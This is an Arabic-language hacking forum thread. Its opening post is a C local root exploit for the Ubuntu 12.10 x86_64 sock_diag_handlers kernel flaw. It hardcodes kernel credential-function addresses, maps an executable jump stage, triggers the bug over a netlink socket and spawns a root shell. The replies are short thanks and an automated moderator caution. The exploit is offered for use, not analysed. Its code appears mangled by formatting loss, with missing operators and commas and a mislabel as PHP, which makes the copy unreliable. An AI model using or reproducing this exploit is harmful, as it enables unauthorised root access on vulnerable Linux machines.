1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة
الكاتب : nasern | المشاهدات : 1,253 | الردود : 5
حالة الموضوع:
مغلق
  1. nasern

    nasern Active DeveloPer

    الأنتساب:
    ‏26 مارس 2012
    المشاركات:
    93
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    [ مقدمة ]

    بسم الله الرحمن الرحيم
    و الصلاة والسلام على أشرف الأنبياء والمرسلين
    سيدنا وحبيبنا محمدا عليه أفضل الصلاة وأزكى التسليم
    وعلى أصحابه الطيبين الطاهرين الى يوم الدين
    أما بعد,,,

    ---------------------------------------------



    [ الثغره ]





    كود PHP:
    #include <unistd.h>
    #include <sys/socket.h>
    #include <linux/netlink.h>
    #include <netinet/tcp.h>
    #include <errno.h>
    #include <linux/if.h>
    #include <linux/filter.h>
    #include <string.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <linux/sock_diag.h>
    #include <linux/inet_diag.h>
    #include <linux/unix_diag.h>
    #include <sys/mman.h>
     
    typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
    typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
    _commit_creds commit_creds;
    _prepare_kernel_cred prepare_kernel_cred;
    unsigned long sock_diag_handlersnl_table;
     
    int __attribute__((regparm(3)))
    x()
    {
        
    commit_creds(prepare_kernel_cred(0));
        return -
    1;
    }
     
    char stage1[] = "\xff\x25\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
     
    int main() {
        
    int fd;
        
    unsigned long mmap_startmmap_size 0x10000;
        
    unsigned family;
        
    struct {
            
    struct nlmsghdr nlh;
            
    struct unix_diag_req r;
        } 
    req;
        
    char    buf[8192];
     
        if ((
    fd socket(AF_NETLINKSOCK_RAWNETLINK_SOCK_DIAG)) < 0){
            
    printf("Can't create sock diag socket\n");
            return -
    1;
        }
     
        
    memset(&req0sizeof(req));
        
    req.nlh.nlmsg_len sizeof(req);
        
    req.nlh.nlmsg_type SOCK_DIAG_BY_FAMILY;
        
    req.nlh.nlmsg_flags NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST;
        
    req.nlh.nlmsg_seq 123456;
     
        
    req.r.udiag_states = -1;
        
    req.r.udiag_show UDIAG_SHOW_NAME UDIAG_SHOW_PEER UDIAG_SHOW_RQLEN;
     
        
    /* Ubuntu 12.10 x86_64 */
        
    req.r.sdiag_family 0x37;
        
    commit_creds = (_commit_creds0xffffffff8107d180;
        
    prepare_kernel_cred = (_prepare_kernel_cred0xffffffff8107d410;
        
    mmap_start 0x1a000;
     
        if (
    mmap((void*)mmap_startmmap_sizePROT_READ|PROT_WRITE|PROT_EXEC,
            
    MAP_SHARED|MAP_FIXED|MAP_ANONYMOUS, -10) == MAP_FAILED) {
     
            
    printf("mmap fault\n");
            exit(
    1);
        }
     
        *(
    unsigned long *)&stage1[sizeof(stage1)-sizeof(&x)] = (unsigned long)x;
        
    memset((void *)mmap_start0x90mmap_size);
        
    memcpy((void *)mmap_start+mmap_size-sizeof(stage1), stage1sizeof(stage1));
     
        
    send(fd, &reqsizeof(req), 0);
        if(!
    getuid())
            
    system("/bin/sh");
    }
     
  2. روبورت1

    روبورت1 <img src="http://im34.gulfup.com/s2o63.gif"><br>فر

    الأنتساب:
    ‏8 نوفمبر 2012
    المشاركات:
    654
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    18
    عزيزي الكاتب ، شكراً لك على الإفادة في المنتدى بإضافة مادّة علمية جديدة إليه
    كتب الله لك أجر كل من استفاد منها.

    * تنبيه للأعضاء والزوّار ، نتمنّى عدم دخول أيّة روابط خارجيّة أو تحميل أي مرفق موجود بالموضوع
    حتى يتم تأكيد سلامة المحتوى برد من قبل أحد أعضاء فريق الفحص أو مشرف القسم.

    هذه العضوية آليّة ، غير مُدارة من قبل أي عُنصر بشري ، إنما مبرمجة لتقوم ببعض أعمال التنظيم والمتابعة في المنتدى.
     
  3. slam

    slam ExpErt DeveloPer

    الأنتساب:
    ‏14 سبتمبر 2011
    المشاركات:
    238
    الإعجابات المتلقاة:
    5
    نقاط الجائزة:
    18
    الإقامة:
    MY HOME
    رد: Ubuntu 12.10 64-Bit sock_diag_handlers Local Root Exploit

    مبــدع
    وآإأصل

    )5:"
     
  4. ÍяâΘ

    ÍяâΘ Developer

    الأنتساب:
    ‏30 نوفمبر 2012
    المشاركات:
    63
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الإقامة:
    ÍŕÁΘ
    رد: Ubuntu 12.10 64-Bit sock_diag_handlers Local Root Exploit

    تعيش يابطل ​
     
  5. DarK c0d3r

    DarK c0d3r Developer

    الأنتساب:
    ‏12 أكتوبر 2011
    المشاركات:
    31
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    8
    رد: Ubuntu 12.10 64-Bit sock_diag_handlers Local Root Exploit

    :{2}:​
     
  6. Dr.hac

    Dr.hac Developer

    الأنتساب:
    ‏8 سبتمبر 2011
    المشاركات:
    53
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    8
    الإقامة:
    IQ-TeaM
    رد: Ubuntu 12.10 64-Bit sock_diag_handlers Local Root Exploit

    مشكور اخي &:":​
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة